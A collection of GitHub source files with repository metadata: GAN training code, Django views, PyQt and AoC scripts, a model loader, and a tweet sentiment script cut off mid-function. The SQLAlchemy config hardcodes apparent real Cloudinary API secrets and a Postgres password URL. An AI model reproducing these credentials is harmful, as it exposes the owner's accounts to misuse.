        target_image = augmentations["image0"]
        input_image = DataTransformation.transform(image=input_image)["image"]
        target_image = DataTransformation.tranform_mask(image=target_image)[
            "image"]
        return input_image, target_image
def get_l1_loss(weights) -> torch.Tensor:
    """Sum of absolute values of *weights* (L1 penalty)."""
    return weights.abs().sum()
def get_l2_loss(weights) -> torch.Tensor:
    """Sum of squared values of *weights* (L2 penalty)."""
    return (weights * weights).sum()
def train_fn(
    disc, gen, loader, opt_disc, opt_gen, l1_loss, bce, gen_scaler, disc_scaler,
) -> None:
    """Run one epoch of alternating discriminator/generator updates with AMP.

    Uses mixed precision (autocast + GradScaler) for both losses and shows
    smoothed discriminator scores on the progress bar every 10 batches.
    """
    loop = tqdm(loader, leave=True)
    for idx, (x, y) in enumerate(loop):
        x = x.to(config.DEVICE)
        y = y.to(config.DEVICE)

        # Train Discriminator: real pair scored toward 1, generated pair
        # (detached so gradients stop at the generator) toward 0.
        with torch.cuda.amp.autocast():
            y_fake = gen(x)
            Disc_real = disc(x, y)
            Disc_real_loss = bce(Disc_real, torch.ones_like(Disc_real))
            Disc_fake = disc(x, y_fake.detach())
            Disc_fake_loss = bce(Disc_fake, torch.zeros_like(Disc_fake))
            Disc_loss = (Disc_real_loss + Disc_fake_loss) / 2

        # NOTE(review): disc.zero_grad() zeroes the *model* grads here while
        # the generator step uses opt_gen.zero_grad(); both work but the
        # asymmetry looks accidental.
        disc.zero_grad()
        disc_scaler.scale(Disc_loss).backward()
        disc_scaler.step(opt_disc)
        disc_scaler.update()

        # Train generator: fool the discriminator + L1 pixel loss.
        with torch.cuda.amp.autocast():
            Disc_fake = disc(x, y_fake)
            Gen_fake_loss = bce(Disc_fake, torch.ones_like(Disc_fake))
            l1 = l1_loss(y_fake, y) * config.LAMBDA
            # NOTE(review): the L2 term below is computed over the
            # *discriminator's* parameters but added to the generator loss;
            # it contributes no gradient to the generator — confirm intent.
            params = []
            for param in disc.parameters():
                params.append(param.view(-1))
            # l1 = config.LAMBDA * get_l1_loss(torch.cat(params))
            l2 = config.LAMBDA * get_l2_loss(torch.cat(params))
            Gen_loss = Gen_fake_loss + l1 + l2

        opt_gen.zero_grad()
        gen_scaler.scale(Gen_loss).backward()
        gen_scaler.step(opt_gen)
        gen_scaler.update()

        if idx % 10 == 0:
            # Mean sigmoid scores: real should trend toward 1, fake toward 0.
            loop.set_postfix(
                Disc_real=torch.sigmoid(Disc_real).mean().item(),
                Disc_fake=torch.sigmoid(Disc_fake).mean().item(),
            )
# helper functions
def _getTrainDirectoryPath(modelname):
return 'data/'+modelname+'/train' if modelname != None or modelname != '' else 'data/maps/train'
def _getValDirectoryPath(modelname):
return 'data/'+modelname+'/val' if modelname != None or modelname != '' else 'data/maps/val'
def _getDiscCheckpointPath(modelname):
    """Discriminator checkpoint filename for *modelname* ('maps_' fallback).

    Fix: the original `!= None or != ''` condition was always True, so the
    fallback never ran and None crashed on string concatenation.
    """
    return (modelname if modelname else 'maps') + '_' + config.CHECKPOINT_DISC
def _getGenCheckpointPath(modelname):
    """Generator checkpoint filename for *modelname* ('maps_' fallback).

    Fix: the original `!= None or != ''` condition was always True, so the
    fallback never ran and None crashed on string concatenation.
    """
    return (modelname if modelname else 'maps') + '_' + config.CHECKPOINT_GEN
def main(args) -> None:
    """Build the models, optionally restore checkpoints, then train/evaluate.

    Command-line args override the config defaults; each epoch optionally
    trains, periodically checkpoints, and renders one validation sample.
    """
    # get data from the command line arguments
    config.LOAD_MODEL = True if str(args.loadmodel).lower() == 'true' else False
    config.FLIP_TRAIN = True if str(args.flip).lower() == 'true' else False
    config.NUM_EPOCHS = int(
        args.epochs) if args.epochs != None else config.NUM_EPOCHS
    config.MODE = args.mode if args.mode != None else config.MODE
    disc = Discriminator(in_channels=3).to(config.DEVICE)
    gen = Generator(in_channels=3, features=64).to(config.DEVICE)
    # betas=(0.5, 0.999) is the standard Adam setting for GAN training.
    opt_disc = optim.Adam(
        disc.parameters(), lr=config.LEARNING_RATE, betas=(0.5, 0.999),)
    opt_gen = optim.Adam(
        gen.parameters(), lr=config.LEARNING_RATE, betas=(0.5, 0.999))
    BCE = nn.BCEWithLogitsLoss()
    L1_LOSS = nn.L1Loss()
    print('saved gen checkpoint path: ', _getGenCheckpointPath(args.modelname))
    print('saved disc checkpoint path: ',
          _getDiscCheckpointPath(args.modelname))
    print('Load model value: ', config.LOAD_MODEL, type(config.LOAD_MODEL))
    if config.LOAD_MODEL:
        load_checkpoint(
            _getGenCheckpointPath(
                args.modelname), gen, opt_gen, config.LEARNING_RATE,
        )
        load_checkpoint(
            _getDiscCheckpointPath(
                args.modelname), disc, opt_disc, config.LEARNING_RATE,
        )
    train_dataset = SplitData(root_dir=_getTrainDirectoryPath(args.modelname))
    train_loader = DataLoader(
        train_dataset,
        batch_size=config.BATCH_SIZE,
        shuffle=True,
        num_workers=config.NUM_WORKERS,
    )
    # Separate GradScalers for generator and discriminator (mixed precision).
    gen_scaler = torch.cuda.amp.GradScaler()
    disc_scaler = torch.cuda.amp.GradScaler()
    val_dataset = SplitData(root_dir=_getValDirectoryPath(args.modelname))
    val_loader = DataLoader(val_dataset, batch_size=1, shuffle=False)
    val_itr = iter(val_loader)
    for epoch in range(1, config.NUM_EPOCHS+1):
        if(config.MODE == 'train'):
            print('Epoch: {}/{}'.format(epoch, config.NUM_EPOCHS))
            train_fn(
                disc, gen, train_loader, opt_disc, opt_gen, L1_LOSS, BCE, gen_scaler, disc_scaler,
            )
        if config.SAVE_MODEL and epoch % 5 == 0:
            save_checkpoint(
                gen, opt_gen, filename=_getGenCheckpointPath(args.modelname))
            save_checkpoint(
                disc, opt_disc, filename=_getDiscCheckpointPath(args.modelname))
        # NOTE(review): the bare except below silently swallows everything,
        # including val_itr exhaustion and missing 'evaluation/' directory.
        try:
            x, y = next(val_itr)
            # get_test_samples(gen, x, y, epoch, folder="evaluation")
            x, y = x.to(config.DEVICE), y.to(config.DEVICE)
            folder = "evaluation"
            gen.eval()
            with torch.no_grad():
                y_fake = gen(x)
                y_fake = y_fake * 0.5 + 0.5  # undo the [-1, 1] normalization
                save_image(y_fake, folder + f"/y_gen_{epoch}.png")
                save_image(x * 0.5 + 0.5, folder + f"/input_{epoch}.png")
                save_image(y * 0.5 + 0.5, folder + f"/label_{epoch}.png")
            gen.train()
        except:
            pass
if __name__ == "__main__":
    # setting up the argument parser to parse the command line arguments
    # (boolean flags are passed as 'true'/'false' strings and parsed in main).
    argparser = argparse.ArgumentParser()
    argparser.add_argument("--flip", default='false',
                           help="learn the left side of the image")
    argparser.add_argument(
        "--modelname", default=config.MODEL_DEFAULT, help="which model to load")
    argparser.add_argument("--mode", default='test',
                           help='start in train or test mode')
    argparser.add_argument("--epochs", default=50,
                           help="number of epochs to train")
    argparser.add_argument("--loadmodel", default='false', help='load model or not')
    args = argparser.parse_args()
    # printing the passed args to debug
    print(args)
    # run the main function with all the passed command line arguments
    main(args)
| ishon19/CSE676-FinalProject | Pix2Pix.py | Pix2Pix.py | py | 14,819 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "torch.backends",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "torch.nn.Module",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 19,
"usage_type": "name"
},
{
"api_name": "torch.nn.Sequential... |
73659014184 | from django.shortcuts import render, redirect, HttpResponse
from django.contrib import messages
from login.models import User
from .models import Quote
# Create your views here.
def quotes(request):
    """Render the quotes dashboard for the logged-in user.

    Redirects to '/' when no session user exists. The main quote list
    excludes quotes the user has already liked; those appear via `likes`.
    """
    if 'user_id' not in request.session:
        return redirect('/')
    all_users = User.objects.all()
    user = User.objects.get(id=request.session['user_id'])
    # quotes = Quote.objects.all()
    # Quotes this user liked (reverse M2M lookup through users_who_liked).
    likes = Quote.objects.filter(users_who_liked__id=user.id)
    total_likes = likes.count()
    # Newest first, minus the already-liked quotes.
    quotes = Quote.objects.all().order_by('-id').exclude(id__in=[l.id for l in likes])
    all_quotes = Quote.objects.all()
    context = {
        'all_users': all_users,
        'user': user,
        'quotes': quotes,
        'all_quotes': all_quotes,
        'likes': likes,
        'total_likes': total_likes,
    }
    return render(request, "quotes.html", context)
def addQuote(request):
    """Create a quote from POST data after validation; redirect to /quotes.

    On validation failure, flashes each error message and redirects
    without creating anything.
    """
    # NOTE(review): no session guard here (unlike quotes/addLike) — a
    # missing 'user_id' key would raise KeyError; confirm routes require login.
    id = request.session['user_id']
    user = User.objects.get(id=id)
    errors = Quote.objects.validator(request.POST, id)
    if len(errors) > 0:
        for key, value in errors.items():
            messages.error(request, value)
        return redirect("/quotes")
    else:
        new_quote = Quote.objects.create(
            content = request.POST['quote'],
            author = request.POST['author'],
            poster = user,
        )
    return redirect("/quotes")
def addLike(request, quote_id):
    """Record that the session user likes the quote with *quote_id*."""
    if 'user_id' not in request.session:
        return redirect('/')
    liker = User.objects.get(id=request.session['user_id'])
    liker.likes.add(Quote.objects.get(id=quote_id))
    return redirect('/quotes')
def deleteQuote(request, quote_id):
    """Delete the quote with *quote_id* and redirect to /quotes."""
    # NOTE(review): no session or ownership check — any request can delete
    # any quote; confirm whether this route should be restricted to the poster.
    q2del = Quote.objects.get(id=quote_id)
    q2del.delete()
    return redirect('/quotes')
| everhartC/QuoteDash | quoteApp/views.py | views.py | py | 1,807 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.shortcuts.redirect",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "login.models.User.objects.all",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "login.models.User.objects",
"line_number": 11,
"usage_type": "attribute"
},
{
... |
14893965980 | #coding: utf-8
import sys,io
from PyQt5.QtWidgets import *
from PyQt5.QtCore import *
from PyQt5.QtGui import QIcon
class Main(QWidget):
    """Small PyQt window: takes text input and writes it slash-delimited
    to textfile.txt when the button is pressed."""

    def __init__(self):
        super().__init__()
        self.mainUI()

    def mainUI(self):
        """Build the window: a line edit over a button wired to buttonClicked."""
        self.setGeometry(300, 300, 300, 300)
        self.setWindowTitle('文字区切り君')
        self.lineEdit = QLineEdit(self)
        self.button = QPushButton('区切る!', self)
        self.button.clicked.connect(self.buttonClicked)
        # layout
        self.vbox = QVBoxLayout()
        self.vbox.addWidget(self.lineEdit)
        self.vbox.addWidget(self.button)
        self.setLayout(self.vbox)
        self.show()

    def buttonClicked(self):
        """Join the entered characters with '/' and save to textfile.txt.

        Fixes: the original empty-input guard was a no-op `pass` (it fell
        through and wrote an empty file) — now it returns early; the file
        is written as UTF-8 explicitly (input is Japanese text) and closed
        via a context manager.
        """
        contents = str(self.lineEdit.text())
        if not contents:
            return
        strings = '/'.join(contents)
        with open('textfile.txt', 'w', encoding='utf-8') as f:
            f.write(strings)
if __name__ == '__main__':
    # Reconfigure stdout for UTF-8 BEFORE starting the app: the original
    # placed this line after sys.exit(), where it could never execute.
    sys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding='utf-8')
    app = QApplication(sys.argv)
    gui = Main()
    sys.exit(app.exec_())
| hirotask/-Python-mojiretu_kugiru | 文字列区切る君/main.py | main.py | py | 1,205 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "sys.argv",
"line_number": 46,
"usage_type": "attribute"
},
{
"api_name": "sys.exit",
"line_number": 48,
"usage_type": "call"
},
{
"api_name": "sys.stdout",
"line_number": 49,
"usage_type": "attribute"
},
{
"api_name": "io.TextIOWrapper",
"line_n... |
15871423301 | from pathlib import Path
from typing import Any, Dict
import torch
from tsm import TSM
from tsn import TSN, TRN, MTRN
verb_class_count, noun_class_count = 125, 352
class_count = (verb_class_count, noun_class_count)
def make_tsn(settings):
    """Build a TSN model from a settings dictionary."""
    # Flow inputs stack several frames per segment; RGB uses a single frame.
    new_length = settings["flow_length"] if settings["modality"] == "Flow" else 1
    return TSN(
        class_count,
        settings["segment_count"],
        settings["modality"],
        base_model=settings["arch"],
        new_length=new_length,
        consensus_type=settings["consensus_type"],
        dropout=settings["dropout"],
    )
def make_trn(settings):
    """Build a TRN or multi-scale TRN (MTRN) from a settings dictionary."""
    model_type = settings["model_type"]
    cls = {"trn": TRN, "mtrn": MTRN}.get(model_type)
    if cls is None:
        raise ValueError(f"Unknown model_type '{model_type}' for TRN")
    new_length = settings["flow_length"] if settings["modality"] == "Flow" else 1
    return cls(
        class_count,
        settings["segment_count"],
        settings["modality"],
        base_model=settings["arch"],
        new_length=new_length,
        img_feature_dim=settings["img_feature_dim"],
        dropout=settings["dropout"],
    )
def make_tsm(settings):
    """Build a TSM model (optionally with non-local blocks) from settings."""
    # The '-nl' suffix on the model type selects the non-local variant.
    uses_non_local = settings["model_type"].endswith("-nl")
    new_length = settings["flow_length"] if settings["modality"] == "Flow" else 1
    return TSM(
        class_count,
        settings["segment_count"],
        settings["modality"],
        base_model=settings["arch"],
        new_length=new_length,
        consensus_type="avg",
        dropout=settings["dropout"],
        shift_div=settings["shift_div"],
        shift_place=settings["shift_place"],
        temporal_pool=settings["temporal_pool"],
        non_local=uses_non_local,
    )
def make_model(settings: Dict[str, Any]) -> torch.nn.Module:
    """Dispatch to the factory matching settings["model_type"].

    Raises KeyError for an unrecognised model type, as before.
    """
    factories = {
        "tsn": make_tsn,
        "trn": make_trn,
        "mtrn": make_trn,
        "tsm": make_tsm,
        "tsm-nl": make_tsm,
    }
    factory = factories[settings["model_type"]]
    return factory(settings)
def get_model_settings_from_checkpoint(ckpt: Dict[str, Any]) -> Dict[str, Any]:
    """Extract the settings dict needed by make_model from a checkpoint."""
    settings = {
        k: ckpt[k] for k in ("model_type", "segment_count", "modality", "arch")
    }
    model_type = ckpt["model_type"]
    # Architecture-specific keys.
    if model_type == "tsn":
        settings["consensus_type"] = ckpt["consensus_type"]
    if model_type in ("tsm", "tsm-nl"):
        for k in ("shift_place", "shift_div", "temporal_pool", "non_local"):
            settings[k] = ckpt[k]
    if model_type in ("trn", "mtrn"):
        settings["img_feature_dim"] = ckpt["img_feature_dim"]
    # Training-time arguments stored as an attribute namespace.
    args = ckpt["args"]
    settings["flow_length"] = args.flow_length
    settings["dropout"] = args.dropout
    return settings
def load_checkpoint(checkpoint_path: Path) -> torch.nn.Module:
    """Rebuild the model described by a checkpoint and load its weights."""
    checkpoint = torch.load(checkpoint_path)
    settings = get_model_settings_from_checkpoint(checkpoint)
    rebuilt = make_model(settings)
    rebuilt.load_state_dict(checkpoint["state_dict"])
    return rebuilt
| epic-kitchens/epic-kitchens-55-action-models | model_loader.py | model_loader.py | py | 2,906 | python | en | code | 73 | github-code | 36 | [
{
"api_name": "tsn.TSN",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "tsn.TRN",
"line_number": 28,
"usage_type": "name"
},
{
"api_name": "tsn.MTRN",
"line_number": 30,
"usage_type": "name"
},
{
"api_name": "tsm.TSM",
"line_number": 46,
"usage_... |
26192939759 | import os
import png
import math
from color_helpers import convert_16_bit_texture_for_pypng
# IO THPS Scene Image Correction
def shift_row_pixels(row_pixels, shift_amount):
shifted_row = []
shifted_row.extend(row_pixels[shift_amount * -4 :])
shifted_row.extend(row_pixels[0 : shift_amount * -4])
return shifted_row
def shift_image_rows(image_data, shift_amount):
    """Rotate image rows downward *shift_amount* times (last row wraps to top).

    A non-positive amount returns a shallow copy unchanged, as before.
    """
    rows = image_data.copy()
    for _ in range(shift_amount):
        rows = [rows[-1]] + rows[:-1]
    return rows
def shift_image_column(image_data, col_index, shift_amount, image_height):
    """Rotate one 4-channel column of *image_data* vertically by *shift_amount* rows.

    Positive amounts move values downward (with wrap); negative upward.
    Returns a new row list; rows outside the column are copied.
    """
    start = col_index * 4
    # Collect the column as per-row 4-value pixels, rotate, and splice back.
    quads = [image_data[r][start:start + 4] for r in range(image_height)]
    rotated = quads[-shift_amount:] + quads[:-shift_amount]
    return [
        image_data[r][:start] + rotated[r] + image_data[r][start + 4:]
        for r in range(image_height)
    ]
def fix_pixel_data(width, height, pixels):
    """Reassemble a flat pixel list into corrected RGBA rows.

    Steps: mirror each row horizontally (pixels are iterated in reverse),
    shift every row right by one pixel, shift all rows down by one, then
    shift column 0 up by one. Presumably this compensates for how the
    THPS scene exporter lays out texture data — TODO confirm against the
    extractor's format notes.
    """
    initial_image = []
    for row in range(0, height):
        cur_row = []
        # Reversed iteration mirrors the row left-to-right.
        for col in reversed(range(row * width, (row + 1) * width)):
            cur_row.extend(pixels[col])
        shifted_right = shift_row_pixels(cur_row, 1)
        initial_image.append(shifted_right)
    shifted_down = shift_image_rows(initial_image, 1)
    return shift_image_column(shifted_down, 0, -1, height)
# End IO THPS Scene Image Correction
def write_image(output_path, width, height, final_image):
    """Write *final_image* (rows of RGBA values) to *output_path* as a PNG.

    Fixes: the output handle is now closed even if the PNG writer raises
    (context manager), and a bare filename without a directory component
    no longer crashes os.makedirs('').
    """
    parent = os.path.dirname(output_path)
    if parent:
        os.makedirs(parent, exist_ok=True)
    writer = png.Writer(width, height, greyscale=False, alpha=True)
    with open(output_path, "wb") as output_file:
        writer.write(output_file, final_image)
def write_to_png(filename, output_dir, create_sub_dirs, pvr, pixels):
    """Decode one PVR texture's pixels and write them as a PNG.

    The output name combines the source filename stem and the texture's
    header offset (hex). 16-bit-palette textures take a separate
    conversion path.
    """
    stem = "".join(filename.split(".")[0:-1])
    if create_sub_dirs:
        output_dir = os.path.join(output_dir, stem)
    out_path = os.path.join(output_dir, f"{stem}_{pvr.header_offset:#0{8}x}.png")
    if pvr.pal_size == 65536:
        rows = convert_16_bit_texture_for_pypng(pvr.pixel_format, pvr.width, pixels)
    else:
        rows = fix_pixel_data(pvr.width, pvr.height, pixels)
    write_image(out_path, pvr.width, pvr.height, rows)
| slfx77/psx_texture_extractor | helpers.py | helpers.py | py | 2,778 | python | en | code | 11 | github-code | 36 | [
{
"api_name": "os.makedirs",
"line_number": 61,
"usage_type": "call"
},
{
"api_name": "os.path.dirname",
"line_number": 61,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 61,
"usage_type": "attribute"
},
{
"api_name": "png.Writer",
"line_numbe... |
23013394729 | import requests
import os
def gokidsgo():
    """Prompt for a URL (defaulting to a local test path), fetch it, and
    print the body or the HTTP status code on failure.

    Improvement: the two branches duplicated the whole fetch/print logic;
    only the URL selection differs, so the request path is now shared.
    """
    a = input('Url? default: 127.0.0.1/').rstrip()
    if a == '':
        url = 'http://127.0.0.1/icons/folder.gif'
        print('grabbing: ' + url)
    else:
        url = a
    req = requests.get(url, timeout=90)
    if req.ok:
        print(req.text)
    else:
        print('error: ')
        print(str(req.status_code))
def main():
    """Prompt for a command: 'go' (or empty) fetches a URL, 'exit' quits."""
    # NOTE(review): any other input falls through all three checks and the
    # function simply returns — there is no loop back to the prompt here;
    # confirm whether re-prompting was intended.
    a = input('ready, type go, or type exit').rstrip()
    if a.find('exit') > -1:
        print('quitting')
        quit()
    if a.find('go') > -1:
        gokidsgo()
    if a == '':
        gokidsgo()
main()
if __name__ == "__main__":
main() | thcsparky/bigclickskid | oldtries/sandbox.py | sandbox.py | py | 952 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "requests.get",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 21,
"usage_type": "call"
}
] |
4275879545 | from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
import cloudinary
# SECURITY: the Cloudinary API secret and the full database connection URL
# (including password) are hardcoded below and committed to the repository.
# These credentials should be rotated and moved to environment variables.
cloudinary.config(
    cloud_name="djtxsnk9c",
    api_key="372171617535646",
    api_secret="2zMo8MA5wgslqPtRwHOVS1AFRks",
)
# SQLALCHEMY_DATABASE_URL = "sqlite:///./sql_app.db"
SQLALCHEMY_DATABASE_URL = "postgres://dmgshbpnrymmwi:262dd54c1af68404d1ad96bfc7d61323703e56f967432b51931a3f6a6643ed4d@ec2-34-206-8-52.compute-1.amazonaws.com:5432/d6bnjatookfchk"
# "postgresql://fastapi_user:fastapi@localhost/fastapi_db"
engine = create_engine(
    SQLALCHEMY_DATABASE_URL,  # connect_args={"check_same_thread": False}
)
# Session factory and declarative base shared by the app's models.
SessionLocal = sessionmaker(autocommit=False, autoflush=False, bind=engine)
Base = declarative_base()
| ddicko/deploy_fastapi | sql_app/database.py | database.py | py | 775 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "cloudinary.config",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "sqlalchemy.create_engine",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "sqlalchemy.orm.sessionmaker",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": ... |
28985781241 | from collections import Counter
from typing import Generator, Iterable, Literal, Set
import click
import trimesh.creation
from aoc_2022_kws.cli import main
from aoc_2022_kws.config import config
from trimesh import transformations
class Facet:
    """One unit face of a lattice cube, identified by axis and position.

    Equality and hashing deliberately ignore *vector* (the sign of the
    face normal): two adjacent cubes produce the same Facet for their
    shared face, which is how covered faces are detected.
    """

    def __init__(
        self, axis: Literal["x", "y", "z"], x: int, y: int, z: int, vector: int
    ):
        self.axis = axis
        self.x = x
        self.y = y
        self.z = z
        self.vector = vector

    def _key(self):
        # Identity used for comparison/hashing; excludes the normal sign.
        return (self.axis, self.x, self.y, self.z)

    def __repr__(self):
        return f"Facet({self.axis}, {self.x}, {self.y}, {self.z} [{self.vector}])"

    def __eq__(self, other):
        return self._key() == other._key()

    def __hash__(self):
        return hash(self._key())
class Cube:
    """A unit lattice cube, constructible from an "x,y,z" string or three ints."""

    def __init__(self, *args):
        if len(args) == 1:
            # Single argument: a comma-separated coordinate string.
            self.x, self.y, self.z = (int(part) for part in args[0].split(","))
        else:
            self.x, self.y, self.z = args

    def __eq__(self, other):
        return (self.x, self.y, self.z) == (other.x, other.y, other.z)

    def __hash__(self):
        return hash((self.x, self.y, self.z))

    @property
    def faces(self) -> Generator["Facet", None, None]:
        """Yield the six unit faces bounding this cube."""
        yield Facet("x", self.x, self.y, self.z, -1)
        yield Facet("x", self.x + 1, self.y, self.z, 1)
        yield Facet("y", self.x, self.y, self.z, -1)
        yield Facet("y", self.x, self.y + 1, self.z, 1)
        yield Facet("z", self.x, self.y, self.z, -1)
        yield Facet("z", self.x, self.y, self.z + 1, 1)

    @property
    def mesh(self):
        """A unit trimesh box translated to occupy this lattice cell."""
        offset = transformations.translation_matrix(
            (self.x + 0.5, self.y + 0.5, self.z + 0.5)
        )
        return trimesh.creation.box(extents=(1, 1, 1), transform=offset)

    def exterior(self, cubes: Set["Cube"]):
        """True if at least one neighbour is missing from *cubes* (else None)."""
        if set(self.neighbours) - set(cubes):
            return True

    def neighbour(self, x=0, y=0, z=0):
        return Cube(self.x + x, self.y + y, self.z + z)

    @property
    def neighbours(self):
        """The six face-adjacent cubes, in -x/+x/-y/+y/-z/+z order."""
        deltas = [(-1, 0, 0), (1, 0, 0), (0, -1, 0), (0, 1, 0), (0, 0, -1), (0, 0, 1)]
        return [self.neighbour(dx, dy, dz) for dx, dy, dz in deltas]
def calculate_bounding_box(cubes: Iterable["Cube"]):
    """Return (x_min, y_min, z_min, x_max, y_max, z_max) over *cubes*.

    Bug fix: the extrema were seeded at 0, so a cube cloud lying entirely
    in positive (or negative) space had its bounding box stretched to
    include the origin. The extrema are now seeded from the first cube.
    Returns all zeros for an empty iterable (matching the old behaviour).
    """
    iterator = iter(cubes)
    first = next(iterator, None)
    if first is None:
        return 0, 0, 0, 0, 0, 0
    x_min = x_max = first.x
    y_min = y_max = first.y
    z_min = z_max = first.z
    for cube in iterator:
        x_min = min(x_min, cube.x)
        y_min = min(y_min, cube.y)
        z_min = min(z_min, cube.z)
        x_max = max(x_max, cube.x)
        y_max = max(y_max, cube.y)
        z_max = max(z_max, cube.z)
    return x_min, y_min, z_min, x_max, y_max, z_max
@main.command()
@click.option("--sample", "-s", is_flag=True)
@click.option("--save", type=click.Path(dir_okay=False), default=None)
@click.option("--view", is_flag=True)
def day18(sample, save, view):
    """AoC 2022 day 18: surface area of a lava droplet made of unit cubes.

    Part 1 counts faces not shared between two cubes; part 2 additionally
    excludes faces bordering fully-enclosed internal voids (found by
    eroding exterior-reachable void cubes from the padded bounding box).
    --save/--view export or display the cubes as a single trimesh mesh.
    """
    if sample:
        input_data = (config.SAMPLE_DIR / "day18.txt").read_text()
    else:
        input_data = (config.USER_DIR / "day18.txt").read_text()

    cubes = [Cube(line) for line in input_data.splitlines()]

    if save:
        combined = trimesh.util.concatenate([c.mesh for c in cubes])
        combined.export(save)
    if view:
        combined = trimesh.util.concatenate([c.mesh for c in cubes])
        combined.show()
    if view or save:
        return

    # Part 1: faces appearing more than once are shared between two cubes.
    all_faces = []
    for c in cubes:
        all_faces.extend(c.faces)
    face_counts = Counter(all_faces)
    covered_faces = set([f for f, c in face_counts.items() if c > 1])
    surface_faces = set(all_faces) - covered_faces
    print("Part 1", len(surface_faces))

    #######################################
    #               Part 2                #
    #######################################
    x_min, y_min, z_min, x_max, y_max, z_max = calculate_bounding_box(cubes)
    print("Bounding box", x_min, y_min, z_min, x_max, y_max, z_max)

    # Every empty cell inside the padded bounding box is a "void" candidate.
    void_cubes = set()
    for x in range(x_min - 1, x_max + 2):
        for y in range(y_min - 1, y_max + 2):
            for z in range(z_min - 1, z_max + 2):
                my_cube = Cube(x, y, z)
                if not my_cube in cubes:
                    void_cubes.add(my_cube)
    print("Void cubes", len(void_cubes))

    # Repeatedly peel off void cubes with a neighbour outside the region;
    # whatever voids remain are sealed inside the droplet.
    whole_area = set(cubes) | set(void_cubes)
    print("Before", len(whole_area))
    to_remove: Set | None = None
    while to_remove is None or len(to_remove) > 0:
        if to_remove:
            whole_area -= to_remove
        to_remove = set()
        for my_cube in whole_area & void_cubes:
            if my_cube in void_cubes and my_cube.exterior(whole_area):
                to_remove.add(my_cube)

    internal_void_cubes = set([c for c in whole_area if c in void_cubes])
    print("After", len(internal_void_cubes))

    # Faces touching internal voids are not reachable from outside.
    internal_faces = set(f for c in internal_void_cubes for f in c.faces)
    external_faces = surface_faces - internal_faces
    print("Part 2", len(external_faces))
| SocialFinanceDigitalLabs/AdventOfCode | solutions/2022/kws/aoc_2022_kws/day_18.py | day_18.py | py | 5,002 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "typing.Literal",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "typing.Generator",
"line_number": 50,
"usage_type": "name"
},
{
"api_name": "trimesh.transformations.translation_matrix",
"line_number": 60,
"usage_type": "call"
},
{
"api_na... |
38285078798 | from setuptools import find_packages, setup
with open("README.txt") as f:
readme = f.read() + "\n"
with open("CHANGES.txt") as f:
readme += f.read() + "\n"
with open("HACKING.txt") as f:
readme += f.read()
setup(
name="fc.qemu",
version="1.4.1.dev0",
author="Christian Kauhaus, Christian Theune",
author_email="mail@flyingcircus.io",
url="http://github.com/flyingcircusio/fc.qemu",
description="Qemu VM management utilities",
long_description=readme,
packages=find_packages("src"),
package_dir={"": "src"},
include_package_data=True,
classifiers=[
"Development Status :: 5 - Production/Stable",
"Environment :: Console",
"Programming Language :: Python :: 3.8",
],
zip_safe=False,
license="BSD",
namespace_packages=["fc"],
install_requires=[
"colorama", # ==0.3.3',
"abaez.consulate==1.1.0",
"psutil", # ==5.4.2',
"PyYaml>=5.3.1",
"requests", # ==2.11.1',
"setuptools",
"structlog>=16.1.0",
],
entry_points={
"console_scripts": [
"fc-qemu = fc.qemu.main:main",
"supervised-qemu = fc.qemu.hazmat.supervise:main",
],
},
)
| flyingcircusio/fc.qemu | setup.py | setup.py | py | 1,233 | python | en | code | 4 | github-code | 36 | [
{
"api_name": "setuptools.setup",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "setuptools.find_packages",
"line_number": 18,
"usage_type": "call"
}
] |
70853975785 | # -*- coding: utf-8 -*-
from __future__ import print_function
from nltk.stem.porter import PorterStemmer
from textblob import TextBlob
from wordcloud import WordCloud
import nltk
import json
import matplotlib.pyplot as plt
import os
import string
from textblob.sentiments import NaiveBayesAnalyzer
ps = PorterStemmer()
tweetDict = {}
def main(name,location):
directory = "Corpus Data"
count = 0
if location == "":
filename = 'tweet_stream_{}.json'.format(name)
fileCorpus = 'tweet_stream_{}.txt'.format(name)
else:
filename = 'tweet_stream_{}_{}.json'.format(name,location)
fileCorpus = 'tweet_stream_{}_{}.txt'.format(name,location)
print(filename)
#Read dataset containing tweets
with open(filename) as json_file:
tweets = json.load(json_file)
with open(directory + '/' + fileCorpus, 'w') as f:
for tweet in tweets:
#Removal of special characters
encoded_tweet=tweet[1].encode('utf-8')
unicode_text = encoded_tweet.decode('unicode_escape').encode('ascii','ignore')
punct=string.punctuation
table_p=string.maketrans(punct,len(punct)*" ")
text=unicode_text.translate(table_p)
tweetDict[count] = [tweet[0],text]
if not os.path.exists(directory):
os.makedirs(directory)
f.write(tweet[1].encode('utf-8'))
f.write('\n')
count += 1
sub = []
pol = []
cnt = 1
for key,value in tweetDict.iteritems():
#if value[0].strip() == dateVal.strip():
#Call to removal_stop_words
text_without_stopwords = remove_stop_words(value[1])
#TextBlob using NaiveBayes
text = TextBlob(text_without_stopwords,analyzer = NaiveBayesAnalyzer())
pol.append(text.sentiment.p_pos)
sub.append(text.sentiment.p_neg)
print(cnt)
cnt += 1
#TextBlob without NaiveBayes
# text = TextBlob(value[1])
# pol.append(text.sentiment.polarity)
# sub.append(text.sentiment.subjectivity)
word_cloud()
resultPolarity = sum(pol)/len(pol)
resultSubjectivity = sum(sub)/len(sub)
print(resultPolarity,resultSubjectivity)
return resultPolarity,resultSubjectivity
#Removal of stopwords
def remove_stop_words(text):
keyword = ' '
stop = set(nltk.corpus.stopwords.words('english'))
for i in text.lower().split():
if i not in stop:
#Stemming
stemmedVar = ps.stem(i)
